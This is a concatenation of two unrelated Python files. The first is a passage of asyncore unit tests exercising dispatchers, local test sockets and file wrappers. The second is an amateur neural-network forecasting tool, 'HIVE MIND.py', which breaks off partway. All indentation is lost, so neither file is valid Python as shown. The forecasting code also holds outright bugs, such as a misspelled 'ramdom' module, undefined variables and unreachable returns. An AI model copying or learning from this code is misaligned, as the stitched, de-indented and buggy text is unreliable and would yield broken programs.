handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
while n > 0:
r, w, e = select.select([conn], [], [])
if r:
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace('\n', ''))
if '\n' in data:
break
n -= 1
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
d.handle_accept()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event',
'warning: unhandled accept event']
self.assertEqual(lines, expected)
def test_issue_8594(self):
# XXX - this test is supposed to be removed in next major Python
# version
d = asyncore.dispatcher(socket.socket())
# make sure the error message no longer refers to the socket
# object but the dispatcher instance instead
self.assertRaisesRegexp(AttributeError, 'dispatcher instance',
getattr, d, 'foo')
# cheap inheritance with the underlying socket is supposed
# to still work but a DeprecationWarning is expected
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
family = d.family
self.assertEqual(family, socket.AF_INET)
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, DeprecationWarning))
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@unittest.skipUnless(threading, 'Threading required for this test.')
@test_support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
port = test_support.bind_port(sock)
cap = StringIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = "Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect((HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send('\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
t.join()
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = "It's not dead, it's sleeping!"
with file(TESTFN, 'w') as h:
h.write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), "It's not dead")
self.assertEqual(w.read(6), ", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = "Come again?"
d2 = "I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
self.assertEqual(file(TESTFN).read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class TCPServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, handler=BaseTestHandler, host=HOST, port=0):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()[:2]
def handle_accept(self):
pair = self.accept()
if pair is not None:
self.handler(pair[0])
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, address):
BaseTestHandler.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI(unittest.TestCase):
def tearDown(self):
asyncore.close_all()
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = TCPServer()
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self):
BaseTestHandler.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind((HOST, 0))
self.listen(5)
self.address = self.socket.getsockname()[:2]
def handle_accept(self):
self.flag = True
server = TestListener()
client = BaseClient(server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send('x' * 1024)
server = TCPServer(TestHandler)
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = TCPServer()
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = TCPServer(TestHandler)
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
class TestClient(BaseClient):
def handle_expt(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(chr(244), socket.MSG_OOB)
server = TCPServer(TestHandler)
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = TCPServer()
client = TestClient(server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = TCPServer()
client = BaseClient(server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, socket.AF_INET)
self.assertEqual(s.socket.type, socket.SOCK_STREAM)
def test_bind(self):
s1 = asyncore.dispatcher()
s1.create_socket(socket.AF_INET, socket.SOCK_STREAM)
s1.bind((HOST, 0))
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(socket.AF_INET, socket.SOCK_STREAM)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(socket.error, s2.bind, (HOST, port))
def test_set_reuse_addr(self):
sock = socket.socket()
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except socket.error:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket())
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.create_socket(socket.AF_INET, socket.SOCK_STREAM)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
finally:
sock.close()
@unittest.skipUnless(threading, 'Threading required for this test.')
@test_support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
server = TCPServer()
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1, count=500))
t.start()
self.addCleanup(t.join)
for x in xrange(20):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except socket.error:
pass
finally:
s.close()
class TestAPI_UseSelect(BaseTestAPI):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UsePoll(BaseTestAPI):
use_poll = True
def test_main():
tests = [HelperFunctionTests, DispatcherTests, DispatcherWithSendTests,
DispatcherWithSendTests_UsePoll, TestAPI_UseSelect,
TestAPI_UsePoll, FileWrapperTest]
run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
HIVE MIND.py
|
import datetime
class hivemind:
class mind:
class neurone:
def __init__(self,name,resistance=0,accelerate=0.999,brake=0.999,bayeslearningrate=10):
import random
self.learningrate={}
self.bayeslearningrate=bayeslearningrate
self.inputs={}
self.bias={}
self.bayesbias={}
if isinstance(resistance,str):
self.resistance=ramdom.random()
else:
self.resistance=resistance
self.pain=2
self.fired=[]
self.name=name
self.temp={}
self.me=0
self.accelerate=accelerate
self.brake=brake
def forward(self,imp={},bayes={},error=0):
import random
a=0
c=0
for i in bayes:
if i in self.bayesbias:
try:
c+=(self.bayesbias[i]*bayes[i])
except Exception as ex:
template = "An exception of type {0} occurred. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
print(c)
print(self.bayesbias[i])
print(bayes[i])
print(i)
print(bayes)
input("pause in forward")
else:
if error==2:
print(i)
print(self.bayesinputs)
input("pause")
self.bayesbias[i]=random.random()
self.learningrate[i]=random.random()
c+=self.bayesbias[i]
c=self.outputactivation(c)
if error==1:
print(self.name)
print(c)
input()
if c > self.resistance or self.name=="output":
a=0
for i in imp:
if i in self.bias:
a+=(self.bias[i]*imp[i])
else:
self.bias[i]=random.random()
a=self.outputactivation(a)
self.fired=imp
self.pain=a
return [self.name,a,c]
else:
return []
def backwards(self,actual,estimate,lisp,error=0):
import random
if self.name in lisp or self.name=='output':
if len(self.fired)>0:
a=0
c=actual-abs(estimate)
d=estimate/actual
e=0
if c > 0:
if self.pain < 0:
if actual >0:
sel=0
else:
sel=1
else:
sel=1
else:
if self.pain < 0:
if actual >0:
sel=1
else:
sel=0
else:
sel=0
for i in self.fired:
if i in self.temp:
if sel==1 and self.temp == 1:
self.learningrate[i]=self.learningrate[i]*self.accelerate
else:
self.learningrate[i]=self.learningrate[i]*self.brake
#self.temp[i]=c
try:
if c>0:
for i in self.fired:
self.bias[i]+=self.learningrate[i]
self.bayesbias[i]+=(self.learningrate[i]/self.bayeslearningrate)
self.temp[i]=sel
else:
for i in self.fired:
self.bias[i]-=self.learningrate[i]
self.bayesbias[i]-=(self.learningrate[i]/self.bayeslearningrate)
self.temp[i]=sel
except Exception as ex:
template = "An exception of type {0} occurred. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print(message)
print(self.fired)
print(i)
input("Error in backwards")
temp=self.fired.copy()
self.fired=[]
return temp
#mind needs to take the reply and group all the returns and then feed into next row.
#if mind gets a empty dict back for whole line then it needs to cycle through neurones and top up the bayes dict
def nonresponse(self,estimate):
import random
for i in estimate:
if i !=self.name:
if i in self.bayesbias:
self.bayesbias[i]+=1
else:
self.bayesbias[i]=random.random()+1
self.learningrate[i]=random.random()
def experience(self):
self.accelerate-=0.00000001
self.brake-=0.00000001
if self.brake<0.00000001:
self.brake=0.00000001
if self.accelerate < 1.00000001:
self.accelerate=1.00000001
def reset(self):
self.fired=[]
class Relu:
def outputactivation(self,x):
if x > 0:
return x
else:
return (x*0.1)
return 1 / (1 + math.exp(-x))
class Sigmoid:
def outputactivation(self,x):
import math
return 1 / (1 + math.exp(-x))
class Tanh:
def outputactivation(self,x):
import math
x=math.tanh(x)
return x
class sigmoidneurone(Sigmoid,neurone):
pass
class reluneurone(Relu,neurone):
pass
class tanhneurone(Tanh,neurone):
pass
def __init__(self,width,depth,repeat=0,resistance=0,bayeslearningrate=10,linearegression=0):
self.outputbias={}
self.mind=[]
self.source=[]
self.fired={}
self.repeat=repeat
self.me=0
self.critime={}
self.resistance=resistance
c=0
for i in range(depth):
cortex=[]
for w in range(width):
c+=1
name=str("No:"+str(c)+" row:"+str(i)+" width:"+str(w))
cortex.append(self.reluneurone(name,resistance=resistance,bayeslearningrate=bayeslearningrate))
if linearegression==1:
name='output'
self.output=self.reluneurone(name,resistance=0,bayeslearningrate=bayeslearningrate)
self.mind.append(cortex.copy())
name='output'
self.output=self.reluneurone(name,resistance=0,bayeslearningrate=bayeslearningrate)
def labotomy(self,width=[4,4,4,4,4],typo=['r','r','r','r','r','r'],resistance=[0,0,0,0,0,0],bayeslearningrate=[10,10,10,10,10],linearegression=[0,0,0,0,0]):
count=0
work=4
self.mind=[]
rest=0
bayes=10
c=0
for i in range(len(typo)):
try:
work=width[count]
rest=resistance[count]
bayes=bayeslearningrate[count]
except:
pass
cortex=[]
for w in range(work):
c+=1
name=str("No:"+str(c)+" row:"+str(i)+" width:"+str(w))
if typo[i].lower()=='r':
cortex.append(self.reluneurone(name,resistance=resistance,bayeslearningrate=bayeslearningrate))
if typo[i].lower()=='s':
cortex.append(self.sigmoidneurone(name,resistance=resistance,bayeslearningrate=bayeslearningrate))
if typo[i].lower()=='t':
cortex.append(self.tanhneurone(name,resistance=resistance,bayeslearningrate=bayeslearningrate))
if linearegression[i].lower()==1:
name='output'
self.output=self.reluneurone(name,resistance=resistance,bayeslearningrate=bayeslearningrate)
self.mind.append(cortex.copy())
count+=1
name='output'
self.output=self.reluneurone(name,resistance=resistance,bayeslearningrate=bayeslearningrate)
def forwardpage(self,inputs,error=0):
output=0
nay={}
bay={}
responsenay={}
responsebay={}
for i in inputs:
if isinstance(i,(int,float)):
nay[i]=i
bay[i]=i
else:
nay[i]=1
bay[i]=1
if error==2:
print(inputs)
for cortex in range(len(self.mind)):
responsenay={}
responsebay={}
for nerve in self.mind[cortex]:
response=nerve.forward(nay,bay)
if len(response) >0:
responsenay[response[0]]=response[1]
responsebay[response[0]]=response[2]
if len(responsenay)==0:
for nerve in self.mind[cortex]:
nerve.nonresponse(bay)
if error==2:
print(responsenay)
print(responsebay)
input("pause error 2 at forward page")
nay=responsenay
bay=responsebay
response=self.output.forward(nay,bay)
if len(response)==0:
self.output.nonresponse(bay)
self.output.nonresponse(bay)
else:
output=response[1]
return output
def slow(self):
for cortex in range(len(self.mind)):
for nerve in self.mind[cortex]:
nerve.experience()
def backapage(self,actual,estimate,error=0):
nex=[]
r=[]
if estimate==None:
estimate=0
nex=self.output.backwards(float(actual),float(estimate),[])
#print(nex)
#input()
for cortex in reversed(self.mind):
for nerve in cortex:
try:
response=nerve.backwards(float(actual),float(estimate),nex)
for re in response:
if not re in r:
r.append(re)
except Exception as ex:
pass
nex=r
#print(nex)
#input("Previous Rows")
self.fired=0
def learnbook(self,reader,element,accuracy=30,epochs=10,error=0,key=0,SECONDREAD=0):
estimate=0
lastcount=1
count=1
rightcount=0
mike=0
check=0
for row in reader:
if row.get(element):
project_list=list(row.values())
project_list.remove(row.get(element))
estimate=self.forwardpage(project_list)
self.backapage(row.get(element),estimate)
step=0
temp=0
while step < epochs:
lastcount=rightcount
consider=[0,0,0,0,0,0,0,0,0,0,0,0,0]
count=1
for row in reader:
if row.get(element):
count+=1
project_list=list(row.values())
if key !=0:
project_list.remove(row.get(key))
project_list.remove(row.get(element))
estimate=self.forwardpage(project_list)
if row.get(element) !=0:
self.backapage(row.get(element),estimate)
if error==1:
print(estimate)
print(row.get(element))
input("pause for error in learnbook")
try:
temp=int(round(abs(estimate-row.get(element))/accuracy,0))
except:
pass
try:
consider[temp]+=1
except Exception as ex:
pass
if error==1:
print(project_list)
print(row.get(element))
print(estimate)
print(lastcount)
input("pause error 1 in learnbook")
cumu=0
rightcount=consider[0]/count
if rightcount <check:
self.slow()
check=rightcount
for i in range(len(consider)):
cumu+=((consider[i]/count)*100)
#print("Within a accuracy " + str(i) + " we had a accuracy of " + str((consider[i]/count)*100) + " with cumulatve of " + str(cumu))
step+=1
#print("New Epoch " + str(step))
if isinstance(SECONDREAD,list):
for row in SECONDREAD:
project_list=list(row.values())
project_list.remove(row.get(element))
if key !=0:
project_list.remove(row.get(key))
estimate=self.forwardpage(project_list)
#if estimate < accuracy:
# estimate=accuracy
if error==2:
print(row)
print(project_list)
input("Error 2 in learnbook")
try:
row["ESTIMATE"]=round(estimate,0)
except:
row["ESTIMATE"]="None response from AI, unrecognised engram - pleaser forecast manually"
return SECONDREAD
def prognosticate(self,reader,key,element):
newreader=[]
for row in reader:
newrow={}
project_list=list(row.values())
project_list.remove(row.get(element))
estimate=self.forwardpage(project_list)
if estimate < 30:
estimate=30
for cortex in reversed(self.mind):
for nerve in cortex:
nerve.reset()
estimate=round(estimate,0)
newrow[key]=row[key][-(len(row[key])-(len(key)+1)):]
newrow[str(element)+" Estimate"]=estimate
newreader.append(newrow.copy())
return newreader
def testday(self,reader,accuracy,element,key=0):
newreader=[]
step=0
count=0
eva=0
eve=0
errors=0
checkframe=[]
fileframe=[]
column=0
row=0
for row in reader:
try:
eve+=row.get(element)
count+=1
except:
print(row)
print(row.get(element))
input("error in testday")
try:
average=eve/count
except:
average=0
eve=0
count=0
var=0
hypo=0
for row in reader:
count+=1
newrow={}
project_list=list(row.values())
project_list.remove(row.get(element))
if key !=0:
project_list.remove(row.get(key))
estimate=self.forwardpage(project_list)
try:
eva=estimate-row.get(element)
except:
errors+=1
if abs(eva) < accuracy:
step+=1
var=abs(row.get(element)-average)
hypo+=(var*var)
eve+=(eva*eva)
for cortex in reversed(self.mind):
for nerve in cortex:
nerve.reset()
try:
return [(step/count),(eve/count),errors,hypo/count,]
except:
return [0,0,errors,0,]
def __init__(self,reader,key,startdate,endate,renamekey,start=1,accuracy=15,csvloci=r'C:\CSVs\\',setcritdelay=14,setalert=0,taskmove=1,setpercntile=0.95,setdependency=1):
self.source=[]
self.innaccurate=[]
self.accuraccy=accuracy
self.key=key
self.uPDATE=0
self.renamekey=renamekey
self.startdate=startdate
import os
directory=csvloci+'Analysis\\'
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
print ('Error: Creating directory. ' + directory)
self.csvloci=directory
directory=csvloci+'BrainsInAJar\\'
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
print ('Error: Creating directory. ' + directory)
self.geniusloci=directory
directory=csvloci+'Analysis\\'
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
print ('Error: Creating directory. ' + directory)
self.analysisloci=directory
directory=csvloci+'HIVE\\'
if not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError:
print ('Error: Creating directory. ' + directory)
self.hiveloci=directory
self.enddate=endate
self.hive(reader,startdate)
if start!=0:
if start=="test":
self.randomdata()
else:
self.swarm()
#self.workplanner()
def run(self,reader,queenme=0):
if len(self.deps)==0:
try:
self.deps=self.Open(file_Name=self.geniusloci + '\DEPENDENCIES_FILE')
if self.deps==False:
self.deps={}
except:
self.deps={}
try:
self.tickboxes=self.Open(file_Name=self.geniusloci + '\TICKBOX_FILE')
if self.tickboxes==False:
self.tickboxes={}
except:
self.tickboxes={}
try:
self.alerts=self.Open(file_Name=self.geniusloci +'\ALERT_FILE')
if self.alerts==False:
self.alerts={}
except:
self.alerts={}
try:
self.critime=self.Open(file_Name=self.geniusloci +'\CRITIME_FILE')
if self.critime==False:
self.critime={}
except:
self.critime={}
try:
self.hardforward=self.Open(file_Name=self.geniusloci+'\HARD_FILE')
if self.hardforward==False:
self.hardforward={}
except:
self.hardforward={}
self.hive(reader,self.startdate)
x = threading.Thread(target=self.swarm, args=(self.startdate))
x.start()
q = threading.Thread(target=self.reforecast, args=())
q.start()
if queenme==1:
queeme=threading.Thread(target=self.queen, args=())
queeme.start()
def reference(self):
print("Building the Hive")
print("this is the dates i have found")
print(self.dates)
print(len(self.dates))
print("this is the labels i have found")
print(self.kill)
print(len(self.kill))
print("this is the numbers i have found")
print(self.numbers)
print(len(self.numbers))
def hive(self,reader,startdate,error=0):
def inreader(row,reader,key):
count=0
for newrow in reader:
if row[key]==newrow[key]:
return count
count+=1
return False
def addrow(row,startdate):
newrow={}
newrow["end"]=row[self.enddate]
newrow[self.key]=row[self.key]
newrow[startdate]=row[startdate]
datarea={}
for d in self.dates:
temp=self.tryfindcmrdates(newrow[startdate],row[d])
try:
if temp > 0:
dateme[d]=1
except:
pass
datarea[d]=self.tryfindcmrdates(newrow[startdate],row[d])
#print(datarea.copy())
#input()
newrow["Dates"]=datarea.copy()
datarea={}
for n in self.numbers:
try:
if isinstance(float(row[n]),(float,int)):
datarea[n]=float(row[n])
else:
datarea[n]=None
except:
datarea[n]=None
pass
newrow["Numbers"]=datarea.copy()
for k in self.kill:
if k in row:
if isinstance(row[k],str):
if not self.isdate(row[k]):
if not len(row[k])==0:
if error==1:
print(row[self.key])
print(k)
input(row[k])
datarea[k]=str(k)+':' +str(row[k])
newrow["Labels"]=datarea.copy()
if row[self.key] in tempforecastdates:
newrow["Forecast Dates"]=tempforecastdates[row[self.key]]
del tempforecastdates[row[self.key]]
else:
newrow["Forecast Dates"]={}
if row[self.key] in tempforecastnumbers:
newrow["Forecast Numbers"]=tempforecastnumbers[row[self.key]]
del tempforecastnumbers[row[self.key]]
else:
newrow["Forecast Numbers"]={}
newrow["Reforecast Dates"]={}
newrow["Overide Dates"]={}
newrow["Overide Numbers"]={}
return newrow
if len(self.source)==0:
tech=[]
self.dates=[]
self.numbers=[]
self.kill=[]
tempforecastdates={}
tempforecastnumbers={}
for s in self.source:
tempforecastdates[s[self.key]]=s["Forecast Dates"]
tempforecastnumbers[s[self.key]]=s["Forecast Numbers"]
for row in reader:
for cell in row:
if self.isdate(row[cell]) and cell !=self.key and cell !=startdate:
if not cell in self.dates:
self.dates.append(cell)
try:
if isinstance(float(row[cell]),(float,int)):
if cell !=self.key and cell !=startdate:
if not cell in self.numbers:
self.numbers.append(cell)
except:
pass
if isinstance(row[cell],str) and cell !=self.key and cell !=startdate:
if not isinstance(row[cell],(float,int)):
if not cell in self.kill:
self.kill.append(cell)
now=''
now=self.today
for row in reader:
tech.append(addrow(row,self.startdate))
self.source=tech
else:
temp=[]
for row in reader:
temp=inreader(source,self.source,self.key)
if temp==False:
self.source.append(addrow(row,now))
else:
for d in self.dates:
self.source[temp]["Dates"][d]=row[d]
for n in self.numbers:
self.source[temp]["Numbers"][n]=row[n]
for k in self.kill:
self.source[temp]["Labels"][k]=row[k]
def swarm(self,error=0):
print("Forecasting Dates")
for d in self.dates:
tempreader=[]
otherereader=[]
for row in self.source:
if not d in row["Labels"]:
newrow={}
newrow["TARGET"]=row["Dates"][d]
for k in row["Labels"]:
if k !=d:
newrow[k]=row["Labels"][k]
newrow[self.key]=row[self.key]
if newrow["TARGET"]==None:
otherereader.append(newrow.copy())
else:
if newrow["TARGET"] < 0:
newrow["TARGET"]=0
tempreader.append(newrow.copy())
elif error==1:
print(row[self.key])
print(d)
input()
#print(d)
#self.timestamp()
#print(len(tempreader))
#print(len(otherereader))
#try:
r2=[]
#print(d)
STRING=d.replace('/','-')
